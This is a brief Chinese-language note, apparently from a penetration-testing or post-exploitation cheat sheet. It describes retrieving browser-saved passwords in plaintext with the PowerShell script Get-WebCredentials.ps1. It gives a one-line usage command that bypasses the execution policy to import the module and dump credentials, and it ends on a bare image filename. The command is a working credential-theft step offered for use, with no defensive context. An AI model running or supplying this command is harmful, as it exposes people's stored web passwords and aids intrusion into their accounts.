说明

基于浏览器的密码将以纯文本形式检索

使用工具

powershell脚本Get-WebCredentials.ps1

使用方式

powershell -exec bypass -c “& {Import-Module .\Get-WebCredentials.ps1;get-webcredentials}”
image.png